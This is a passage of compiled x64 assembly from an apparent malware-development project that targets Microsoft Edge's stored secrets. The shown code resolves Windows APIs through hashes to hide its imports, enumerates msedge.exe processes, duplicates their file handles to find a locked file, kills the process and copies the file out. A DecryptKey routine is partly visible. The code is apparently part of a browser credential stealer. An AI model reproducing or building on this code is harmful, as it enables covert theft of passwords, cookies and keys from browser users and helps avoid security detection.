	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
$LN1@DecryptKey:
	add	rsp, 3840				; 00000f00H
	pop	rdi
	ret	0
?DecryptKey@@YAXXZ ENDP					; DecryptKey
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
apiResolve$ = 64
$T1 = 72
$T2 = 73
$T3 = 74
$T4 = 75
$T5 = 76
$T6 = 77
size$7 = 80
bytesRead$8 = 84
lpKernel32$ = 88
hCopy$9 = 96
pCloseHandle$ = 104
bufferProcessInfo$10 = 112
st$11 = 120
retLen$12 = 124
hProc$13 = 128
tv192 = 136
newSize$14 = 140
len$15 = 144
bytesWritten$16 = 148
offset$17 = 152
i$18 = 160
i$19 = 168
processName$ = 176
pid$20 = 200
dupOk$21 = 204
ok$22 = 208
err$23 = 212
hOut$24 = 216
result$25 = 224
newBuffer$26 = 232
info$27 = 240
pGetFileType$28 = 248
hashKernel32$ = 256
hashMessageBoxA$ = 260
hashGetLastError$ = 264
hashCloseHandle$ = 268
hashNtdll$ = 272
hashNtQueryInformationProcess$ = 276
hashOpenProcess$ = 280
hashDuplicateHandle$29 = 284
hashGetFileType$30 = 288
hashGetFinalPathNameByHandleA$31 = 292
hashTerminateProcess$32 = 296
hashCreateFileA$33 = 300
hashReadFile$34 = 304
lpNtdll$ = 312
count$ = 320
pOpenProcess$ = 328
tv170 = 336
pNtQueryInformationProcess$ = 344
tv186 = 352
tv203 = 360
tv208 = 368
h$35 = 376
pDuplicateHandle$36 = 384
handle$37 = 392
tv228 = 400
tv239 = 408
tv244 = 416
pGetFinalPathNameByHandleA$38 = 424
tv290 = 432
tv296 = 440
tv306 = 448
tv309 = 456
pTerminateProcess$39 = 464
tv317 = 472
pCreateFileA$40 = 480
tv332 = 488
tv337 = 496
tv341 = 504
pReadFile$41 = 512
tv361 = 520
pGetLastError$ = 528
pWriteFile$42 = 536
tv377 = 544
tv385 = 552
tv388 = 560
hashWriteFile$43 = 568
pMessageBoxA$ = 576
ov$44 = 584
path$45 = 624
pids$ = 896
buffer$46 = 1920
filename$ = 6032
newFileName$ = 6040
?CreateCopyFile@@YA_NPEAD0@Z PROC			; CreateCopyFile
; File C:\Users\vuong\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\main.cpp
; Line 176
$LN36:
	mov	QWORD PTR [rsp+16], rdx
	mov	QWORD PTR [rsp+8], rcx
	push	rdi
	mov	eax, 6016				; 00001780H
	call	__chkstk
	sub	rsp, rax
; Line 177
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??0ApiResolve@@QEAA@XZ			; ApiResolve::ApiResolve
; Line 178
	mov	DWORD PTR hashKernel32$[rsp], 764661557	; 2d93cf35H
; Line 180
	mov	edx, 764661557				; 2d93cf35H
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetModuleBaseAddress@ApiResolve@@QEAAPEAXI@Z ; ApiResolve::GetModuleBaseAddress
	mov	QWORD PTR lpKernel32$[rsp], rax
; Line 182
	mov	DWORD PTR hashMessageBoxA$[rsp], -459375914 ; e49e7ad6H
; Line 184
	mov	r8d, -459375914				; e49e7ad6H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pMessageBoxA$[rsp], rax
; Line 186
	mov	DWORD PTR hashGetLastError$[rsp], 929337930 ; 3764924aH
; Line 188
	mov	r8d, 929337930				; 3764924aH
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pGetLastError$[rsp], rax
; Line 190
	mov	DWORD PTR hashCloseHandle$[rsp], 1729908677 ; 671c4fc5H
; Line 192
	mov	r8d, 1729908677				; 671c4fc5H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCloseHandle$[rsp], rax
; Line 194
	mov	DWORD PTR hashNtdll$[rsp], -1405057971	; ac40844dH
; Line 195
	mov	edx, -1405057971			; ac40844dH
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetModuleBaseAddress@ApiResolve@@QEAAPEAXI@Z ; ApiResolve::GetModuleBaseAddress
	mov	QWORD PTR lpNtdll$[rsp], rax
; Line 199
	mov	eax, 109				; 0000006dH
	mov	WORD PTR processName$[rsp], ax
	mov	eax, 115				; 00000073H
	mov	WORD PTR processName$[rsp+2], ax
	mov	eax, 101				; 00000065H
	mov	WORD PTR processName$[rsp+4], ax
	mov	eax, 100				; 00000064H
	mov	WORD PTR processName$[rsp+6], ax
	mov	eax, 103				; 00000067H
	mov	WORD PTR processName$[rsp+8], ax
	mov	eax, 101				; 00000065H
	mov	WORD PTR processName$[rsp+10], ax
; Line 200
	mov	eax, 46					; 0000002eH
	mov	WORD PTR processName$[rsp+12], ax
	mov	eax, 101				; 00000065H
	mov	WORD PTR processName$[rsp+14], ax
	mov	eax, 120				; 00000078H
	mov	WORD PTR processName$[rsp+16], ax
	mov	eax, 101				; 00000065H
	mov	WORD PTR processName$[rsp+18], ax
; Line 201
	xor	eax, eax
	mov	WORD PTR processName$[rsp+20], ax
; Line 203
	mov	r8d, 256				; 00000100H
	lea	rdx, QWORD PTR pids$[rsp]
	lea	rcx, QWORD PTR processName$[rsp]
	call	?GetProcessIdsByName@@YA_KPEB_WPEAK_K@Z	; GetProcessIdsByName
	mov	QWORD PTR count$[rsp], rax
; Line 208
	mov	DWORD PTR hashNtQueryInformationProcess$[rsp], 334281917 ; 13ecbcbdH
; Line 217
	mov	r8d, 334281917				; 13ecbcbdH
	mov	rdx, QWORD PTR lpNtdll$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pNtQueryInformationProcess$[rsp], rax
; Line 219
	mov	DWORD PTR hashOpenProcess$[rsp], 488166966 ; 1d18d636H
; Line 221
	mov	r8d, 488166966				; 1d18d636H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pOpenProcess$[rsp], rax
; Line 223
	mov	QWORD PTR i$18[rsp], 0
	jmp	SHORT $LN4@CreateCopy
$LN2@CreateCopy:
	mov	rax, QWORD PTR i$18[rsp]
	inc	rax
	mov	QWORD PTR i$18[rsp], rax
$LN4@CreateCopy:
	mov	rax, QWORD PTR count$[rsp]
	cmp	QWORD PTR i$18[rsp], rax
	jae	$LN3@CreateCopy
; Line 224
	mov	rax, QWORD PTR i$18[rsp]
	mov	eax, DWORD PTR pids$[rsp+rax*4]
	mov	DWORD PTR pid$20[rsp], eax
; Line 225
	mov	rax, QWORD PTR pOpenProcess$[rsp]
	mov	QWORD PTR tv170[rsp], rax
	mov	r8d, DWORD PTR pid$20[rsp]
	xor	edx, edx
	mov	ecx, 2097151				; 001fffffH
	call	QWORD PTR tv170[rsp]
	mov	QWORD PTR hProc$13[rsp], rax
; Line 231
	cmp	QWORD PTR hProc$13[rsp], 0
	jne	SHORT $LN12@CreateCopy
; Line 232
	jmp	SHORT $LN2@CreateCopy
$LN12@CreateCopy:
; Line 235
	mov	DWORD PTR size$7[rsp], 65536		; 00010000H
; Line 236
	mov	QWORD PTR bufferProcessInfo$10[rsp], 0
; Line 237
	mov	eax, DWORD PTR size$7[rsp]
	lea	rdx, QWORD PTR bufferProcessInfo$10[rsp]
	mov	ecx, eax
	call	?AllocMemory@@YA_N_KPEAPEAX@Z		; AllocMemory
	movzx	eax, al
	test	eax, eax
	jne	SHORT $LN13@CreateCopy
; Line 238
	jmp	$LN2@CreateCopy
$LN13@CreateCopy:
; Line 241
	mov	DWORD PTR retLen$12[rsp], 0
$LN5@CreateCopy:
; Line 244
	xor	eax, eax
	cmp	eax, 1
	je	$LN6@CreateCopy
; Line 246
	mov	rax, QWORD PTR pNtQueryInformationProcess$[rsp]
	mov	QWORD PTR tv186[rsp], rax
	lea	rax, QWORD PTR retLen$12[rsp]
	mov	QWORD PTR [rsp+32], rax
	mov	r9d, DWORD PTR size$7[rsp]
	mov	r8, QWORD PTR bufferProcessInfo$10[rsp]
	mov	edx, 51					; 00000033H
	mov	rcx, QWORD PTR hProc$13[rsp]
	call	QWORD PTR tv186[rsp]
	mov	DWORD PTR st$11[rsp], eax
; Line 254
	cmp	DWORD PTR st$11[rsp], 0
	jne	SHORT $LN14@CreateCopy
; Line 255
	jmp	$LN6@CreateCopy
$LN14@CreateCopy:
; Line 257
	cmp	DWORD PTR st$11[rsp], -1073741820	; ffffffffc0000004H
	je	SHORT $LN16@CreateCopy
	cmp	DWORD PTR st$11[rsp], -1073741789	; ffffffffc0000023H
	jne	$LN15@CreateCopy
$LN16@CreateCopy:
; Line 260
	mov	eax, DWORD PTR size$7[rsp]
	cmp	DWORD PTR retLen$12[rsp], eax
	jbe	SHORT $LN34@CreateCopy
	mov	eax, DWORD PTR retLen$12[rsp]
	mov	DWORD PTR tv192[rsp], eax
	jmp	SHORT $LN35@CreateCopy
$LN34@CreateCopy:
	mov	eax, DWORD PTR size$7[rsp]
	shl	eax, 1
	mov	DWORD PTR tv192[rsp], eax
$LN35@CreateCopy:
	mov	eax, DWORD PTR tv192[rsp]
	mov	DWORD PTR newSize$14[rsp], eax
; Line 261
	mov	QWORD PTR newBuffer$26[rsp], 0
; Line 262
	mov	eax, DWORD PTR newSize$14[rsp]
	lea	rdx, QWORD PTR newBuffer$26[rsp]
	mov	ecx, eax
	call	?AllocMemory@@YA_N_KPEAPEAX@Z		; AllocMemory
	movzx	eax, al
	test	eax, eax
	jne	SHORT $LN17@CreateCopy
; Line 263
	mov	rcx, QWORD PTR bufferProcessInfo$10[rsp]
	call	?FreeMemory@@YA_NPEAX@Z			; FreeMemory
; Line 264
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv203[rsp], rax
	mov	rcx, QWORD PTR hProc$13[rsp]
	call	QWORD PTR tv203[rsp]
	npad	1
; Line 265
	mov	BYTE PTR $T1[rsp], 0
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	movzx	eax, BYTE PTR $T1[rsp]
	jmp	$LN1@CreateCopy
$LN17@CreateCopy:
; Line 268
	mov	rcx, QWORD PTR bufferProcessInfo$10[rsp]
	call	?FreeMemory@@YA_NPEAX@Z			; FreeMemory
; Line 269
	mov	eax, DWORD PTR newSize$14[rsp]
	mov	DWORD PTR size$7[rsp], eax
; Line 270
	mov	rax, QWORD PTR newBuffer$26[rsp]
	mov	QWORD PTR bufferProcessInfo$10[rsp], rax
; Line 271
	jmp	$LN5@CreateCopy
$LN15@CreateCopy:
; Line 274
	mov	rcx, QWORD PTR bufferProcessInfo$10[rsp]
	call	?FreeMemory@@YA_NPEAX@Z			; FreeMemory
; Line 275
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv208[rsp], rax
	mov	rcx, QWORD PTR hProc$13[rsp]
	call	QWORD PTR tv208[rsp]
	npad	1
; Line 276
	mov	BYTE PTR $T2[rsp], 0
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	movzx	eax, BYTE PTR $T2[rsp]
	jmp	$LN1@CreateCopy
; Line 277
	jmp	$LN5@CreateCopy
$LN6@CreateCopy:
; Line 279
	mov	rax, QWORD PTR bufferProcessInfo$10[rsp]
	mov	QWORD PTR info$27[rsp], rax
; Line 282
	mov	QWORD PTR i$19[rsp], 0
	jmp	SHORT $LN9@CreateCopy
$LN7@CreateCopy:
	mov	rax, QWORD PTR i$19[rsp]
	inc	rax
	mov	QWORD PTR i$19[rsp], rax
$LN9@CreateCopy:
	mov	rax, QWORD PTR info$27[rsp]
	mov	rax, QWORD PTR [rax]
	cmp	QWORD PTR i$19[rsp], rax
	jae	$LN8@CreateCopy
; Line 283
	imul	rax, QWORD PTR i$19[rsp], 40		; 00000028H
	mov	rcx, QWORD PTR info$27[rsp]
	lea	rax, QWORD PTR [rcx+rax+16]
	mov	QWORD PTR h$35[rsp], rax
; Line 284
	mov	rax, QWORD PTR h$35[rsp]
	mov	rax, QWORD PTR [rax]
	mov	QWORD PTR handle$37[rsp], rax
; Line 286
	mov	QWORD PTR hCopy$9[rsp], 0
; Line 287
	mov	DWORD PTR hashDuplicateHandle$29[rsp], 1017292957 ; 3ca2a89dH
; Line 291
	mov	r8d, 1017292957				; 3ca2a89dH
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pDuplicateHandle$36[rsp], rax
; Line 293
	mov	rax, QWORD PTR pDuplicateHandle$36[rsp]
	mov	QWORD PTR tv228[rsp], rax
	mov	DWORD PTR [rsp+48], 2
	mov	DWORD PTR [rsp+40], 0
	mov	DWORD PTR [rsp+32], 0
	lea	r9, QWORD PTR hCopy$9[rsp]
	mov	r8, -1
	mov	rdx, QWORD PTR handle$37[rsp]
	mov	rcx, QWORD PTR hProc$13[rsp]
	call	QWORD PTR tv228[rsp]
	mov	DWORD PTR dupOk$21[rsp], eax
; Line 303
	cmp	DWORD PTR dupOk$21[rsp], 0
	je	SHORT $LN19@CreateCopy
	cmp	QWORD PTR hCopy$9[rsp], 0
	jne	SHORT $LN18@CreateCopy
$LN19@CreateCopy:
; Line 304
	jmp	$LN7@CreateCopy
$LN18@CreateCopy:
; Line 307
	mov	DWORD PTR hashGetFileType$30[rsp], 1507700099 ; 59ddad83H
; Line 309
	mov	r8d, 1507700099				; 59ddad83H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pGetFileType$28[rsp], rax
; Line 311
	cmp	QWORD PTR pGetFileType$28[rsp], 0
	je	SHORT $LN21@CreateCopy
	mov	rax, QWORD PTR pGetFileType$28[rsp]
	mov	QWORD PTR tv239[rsp], rax
	mov	rcx, QWORD PTR hCopy$9[rsp]
	call	QWORD PTR tv239[rsp]
	cmp	eax, 1
	je	SHORT $LN20@CreateCopy
$LN21@CreateCopy:
; Line 312
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv244[rsp], rax
	mov	rcx, QWORD PTR hCopy$9[rsp]
	call	QWORD PTR tv244[rsp]
	npad	1
; Line 313
	jmp	$LN7@CreateCopy
$LN20@CreateCopy:
; Line 316
	lea	rax, QWORD PTR path$45[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 317
	mov	DWORD PTR hashGetFinalPathNameByHandleA$31[rsp], 203739171 ; 0c24d023H
; Line 324
	mov	r8d, 203739171				; 0c24d023H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pGetFinalPathNameByHandleA$38[rsp], rax
; Line 327
	mov	rax, QWORD PTR pGetFinalPathNameByHandleA$38[rsp]
	mov	QWORD PTR tv290[rsp], rax
	xor	r9d, r9d
	mov	r8d, 260				; 00000104H
	lea	rdx, QWORD PTR path$45[rsp]
	mov	rcx, QWORD PTR hCopy$9[rsp]
	call	QWORD PTR tv290[rsp]
	mov	DWORD PTR len$15[rsp], eax
; Line 334
	cmp	DWORD PTR len$15[rsp], 0
	je	SHORT $LN23@CreateCopy
	cmp	DWORD PTR len$15[rsp], 260		; 00000104H
	jb	SHORT $LN22@CreateCopy
$LN23@CreateCopy:
; Line 335
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv296[rsp], rax
	mov	rcx, QWORD PTR hCopy$9[rsp]
	call	QWORD PTR tv296[rsp]
	npad	1
; Line 336
	jmp	$LN7@CreateCopy
$LN22@CreateCopy:
; Line 338
	mov	QWORD PTR result$25[rsp], 0
; Line 339
	mov	rcx, QWORD PTR filename$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	r9, QWORD PTR result$25[rsp]
	mov	r8, rax
	mov	rdx, QWORD PTR filename$[rsp]
	lea	rcx, QWORD PTR path$45[rsp]
	call	?FindPatternA@@YA_NPEBD0_KPEAPEAD@Z	; FindPatternA
	npad	1
; Line 340
	cmp	QWORD PTR result$25[rsp], 0
	jne	SHORT $LN24@CreateCopy
; Line 341
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv306[rsp], rax
	mov	rcx, QWORD PTR hCopy$9[rsp]
	call	QWORD PTR tv306[rsp]
	npad	1
; Line 342
	jmp	$LN7@CreateCopy
$LN24@CreateCopy:
; Line 345
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv309[rsp], rax
	mov	rcx, QWORD PTR hCopy$9[rsp]
	call	QWORD PTR tv309[rsp]
; Line 346
	mov	DWORD PTR hashTerminateProcess$32[rsp], 714377597 ; 2a94897dH
; Line 348
	mov	r8d, 714377597				; 2a94897dH
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pTerminateProcess$39[rsp], rax
; Line 349
	mov	rax, QWORD PTR pTerminateProcess$39[rsp]
	mov	QWORD PTR tv317[rsp], rax
	xor	edx, edx
	mov	rcx, QWORD PTR hProc$13[rsp]
	call	QWORD PTR tv317[rsp]
	test	eax, eax
	je	SHORT $LN25@CreateCopy
; Line 350
	mov	BYTE PTR $T3[rsp], 1
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	movzx	eax, BYTE PTR $T3[rsp]
	jmp	$LN1@CreateCopy
; Line 351
	jmp	SHORT $LN26@CreateCopy
$LN25@CreateCopy:
; Line 353
	mov	BYTE PTR $T4[rsp], 0
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	movzx	eax, BYTE PTR $T4[rsp]
	jmp	$LN1@CreateCopy
$LN26@CreateCopy:
; Line 355
	mov	DWORD PTR hashCreateFileA$33[rsp], 896765632 ; 35738ec0H
; Line 357
	mov	r8d, 896765632				; 35738ec0H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCreateFileA$40[rsp], rax
; Line 359
	mov	rax, QWORD PTR pCreateFileA$40[rsp]
	mov	QWORD PTR tv332[rsp], rax
	mov	QWORD PTR [rsp+48], 0
	mov	DWORD PTR [rsp+40], 128			; 00000080H
	mov	DWORD PTR [rsp+32], 2
	xor	r9d, r9d
	xor	r8d, r8d
	mov	edx, 1073741824				; 40000000H
	mov	rcx, QWORD PTR newFileName$[rsp]
	call	QWORD PTR tv332[rsp]
	mov	QWORD PTR hOut$24[rsp], rax
; Line 369
	cmp	QWORD PTR hOut$24[rsp], -1
	jne	SHORT $LN27@CreateCopy
; Line 370
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv337[rsp], rax
	mov	rcx, QWORD PTR hCopy$9[rsp]
	call	QWORD PTR tv337[rsp]
; Line 371
	mov	rcx, QWORD PTR bufferProcessInfo$10[rsp]
	call	?FreeMemory@@YA_NPEAX@Z			; FreeMemory
; Line 372
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv341[rsp], rax
	mov	rcx, QWORD PTR hProc$13[rsp]
	call	QWORD PTR tv341[rsp]
	npad	1
; Line 373
	mov	BYTE PTR $T5[rsp], 0
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	movzx	eax, BYTE PTR $T5[rsp]
	jmp	$LN1@CreateCopy
$LN27@CreateCopy:
; Line 377
	mov	DWORD PTR bytesRead$8[rsp], 0
; Line 378
	mov	DWORD PTR bytesWritten$16[rsp], 0
; Line 380
	mov	QWORD PTR offset$17[rsp], 0
$LN10@CreateCopy:
; Line 382
	xor	eax, eax
	cmp	eax, 1
	je	$LN11@CreateCopy
; Line 383
	lea	rax, QWORD PTR ov$44[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 32					; 00000020H
	rep stosb
; Line 384
	mov	eax, -1					; ffffffffH
	mov	rcx, QWORD PTR offset$17[rsp]
	and	rcx, rax
	mov	rax, rcx
	mov	DWORD PTR ov$44[rsp+16], eax
; Line 385
	mov	rax, QWORD PTR offset$17[rsp]
	shr	rax, 32					; 00000020H
	mov	DWORD PTR ov$44[rsp+20], eax
; Line 387
	mov	DWORD PTR hashReadFile$34[rsp], -1576683562 ; a205b7d6H
; Line 391
	mov	r8d, -1576683562			; a205b7d6H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pReadFile$41[rsp], rax
; Line 393
	mov	rax, QWORD PTR pReadFile$41[rsp]
	mov	QWORD PTR tv361[rsp], rax
	lea	rax, QWORD PTR ov$44[rsp]
	mov	QWORD PTR [rsp+32], rax
	lea	r9, QWORD PTR bytesRead$8[rsp]
	mov	r8d, 4096				; 00001000H
	lea	rdx, QWORD PTR buffer$46[rsp]
	mov	rcx, QWORD PTR hCopy$9[rsp]
	call	QWORD PTR tv361[rsp]
	mov	DWORD PTR ok$22[rsp], eax
; Line 401
	cmp	DWORD PTR ok$22[rsp], 0
	jne	SHORT $LN28@CreateCopy
; Line 402
	call	QWORD PTR pGetLastError$[rsp]
	mov	DWORD PTR err$23[rsp], eax
; Line 404
	cmp	DWORD PTR err$23[rsp], 38		; 00000026H
	jne	SHORT $LN29@CreateCopy
; Line 405
	jmp	$LN11@CreateCopy
$LN29@CreateCopy:
; Line 407
	jmp	$LN11@CreateCopy
$LN28@CreateCopy:
; Line 410
	cmp	DWORD PTR bytesRead$8[rsp], 0
	jne	SHORT $LN30@CreateCopy
; Line 411
	jmp	$LN11@CreateCopy
$LN30@CreateCopy:
; Line 413
	mov	DWORD PTR hashWriteFile$43[rsp], -339353823 ; ebc5df21H
; Line 417
	mov	r8d, -339353823				; ebc5df21H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pWriteFile$42[rsp], rax
; Line 419
	mov	rax, QWORD PTR pWriteFile$42[rsp]
	mov	QWORD PTR tv377[rsp], rax
	mov	QWORD PTR [rsp+32], 0
	lea	r9, QWORD PTR bytesWritten$16[rsp]
	mov	r8d, DWORD PTR bytesRead$8[rsp]
	lea	rdx, QWORD PTR buffer$46[rsp]
	mov	rcx, QWORD PTR hOut$24[rsp]
	call	QWORD PTR tv377[rsp]
	test	eax, eax
	jne	SHORT $LN31@CreateCopy
; Line 420
	jmp	SHORT $LN11@CreateCopy
$LN31@CreateCopy:
; Line 423
	mov	eax, DWORD PTR bytesRead$8[rsp]
	cmp	DWORD PTR bytesWritten$16[rsp], eax
	je	SHORT $LN32@CreateCopy
; Line 424
	jmp	SHORT $LN11@CreateCopy
$LN32@CreateCopy:
; Line 427
	mov	eax, DWORD PTR bytesRead$8[rsp]
	mov	rcx, QWORD PTR offset$17[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR offset$17[rsp], rax
; Line 428
	jmp	$LN10@CreateCopy
$LN11@CreateCopy:
; Line 430
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv385[rsp], rax
	mov	rcx, QWORD PTR hCopy$9[rsp]
	call	QWORD PTR tv385[rsp]
; Line 431
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv388[rsp], rax
	mov	rcx, QWORD PTR hOut$24[rsp]
	call	QWORD PTR tv388[rsp]
	npad	1
; Line 432
	jmp	SHORT $LN8@CreateCopy
; Line 433
	jmp	$LN7@CreateCopy
$LN8@CreateCopy:
; Line 434
	mov	rcx, QWORD PTR bufferProcessInfo$10[rsp]
	call	?FreeMemory@@YA_NPEAX@Z			; FreeMemory
	npad	1
; Line 435
	jmp	$LN2@CreateCopy
$LN3@CreateCopy:
; Line 437
	mov	BYTE PTR $T6[rsp], 1
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	movzx	eax, BYTE PTR $T6[rsp]
$LN1@CreateCopy:
; Line 438
	add	rsp, 6016				; 00001780H
	pop	rdi
	ret	0
?CreateCopyFile@@YA_NPEAD0@Z ENDP			; CreateCopyFile
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
apiResolve$ = 32
count$ = 40
lpKernel32$ = 48
hSnap$ = 56
hashKernel32$ = 64
hashCreateToolhelp32Snapshot$ = 68
hashProcess32FirstW$ = 72
hashProcess32NextW$ = 76
hashCloseHandle$ = 80
pCreateToolhelp32Snapshot$ = 88
tv78 = 96
$T1 = 104
pProcess32FirstW$ = 112
tv132 = 120
pProcess32NextW$ = 128
tv147 = 136
pCloseHandle$ = 144
tv152 = 152
$T2 = 160
pe$ = 176
processName$ = 768
outPids$ = 776
maxCount$ = 784
?GetProcessIdsByName@@YA_KPEB_WPEAK_K@Z PROC		; GetProcessIdsByName
; File C:\Users\vuong\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\main.cpp
; Line 125
$LN10:
	mov	QWORD PTR [rsp+24], r8
	mov	QWORD PTR [rsp+16], rdx
	mov	QWORD PTR [rsp+8], rcx
	push	rdi
	sub	rsp, 752				; 000002f0H
; Line 126
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??0ApiResolve@@QEAA@XZ			; ApiResolve::ApiResolve
; Line 127
	mov	QWORD PTR count$[rsp], 0
; Line 128
	mov	DWORD PTR hashKernel32$[rsp], 764661557	; 2d93cf35H
; Line 129
	mov	edx, 764661557				; 2d93cf35H
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetModuleBaseAddress@ApiResolve@@QEAAPEAXI@Z ; ApiResolve::GetModuleBaseAddress
	mov	QWORD PTR lpKernel32$[rsp], rax
; Line 130
	mov	DWORD PTR hashCreateToolhelp32Snapshot$[rsp], 399709492 ; 17d31534H
; Line 132
	mov	r8d, 399709492				; 17d31534H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCreateToolhelp32Snapshot$[rsp], rax
; Line 133
	mov	rax, QWORD PTR pCreateToolhelp32Snapshot$[rsp]
	mov	QWORD PTR tv78[rsp], rax
	xor	edx, edx
	mov	ecx, 2
	call	QWORD PTR tv78[rsp]
	mov	QWORD PTR hSnap$[rsp], rax
; Line 138
	cmp	QWORD PTR hSnap$[rsp], -1
	jne	SHORT $LN5@GetProcess
; Line 139
	mov	QWORD PTR $T1[rsp], 0
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	mov	rax, QWORD PTR $T1[rsp]
	jmp	$LN1@GetProcess
$LN5@GetProcess:
; Line 141
	lea	rax, QWORD PTR pe$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 568				; 00000238H
	rep stosb
; Line 142
	mov	DWORD PTR pe$[rsp], 568			; 00000238H
; Line 144
	mov	DWORD PTR hashProcess32FirstW$[rsp], -392334820 ; e89d721cH
; Line 146
	mov	r8d, -392334820				; e89d721cH
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pProcess32FirstW$[rsp], rax
; Line 148
	mov	DWORD PTR hashProcess32NextW$[rsp], -2126132412 ; 8145cb44H
; Line 150
	mov	r8d, -2126132412			; 8145cb44H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pProcess32NextW$[rsp], rax
; Line 153
	mov	DWORD PTR hashCloseHandle$[rsp], 1729908677 ; 671c4fc5H
; Line 154
	mov	r8d, 1729908677				; 671c4fc5H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
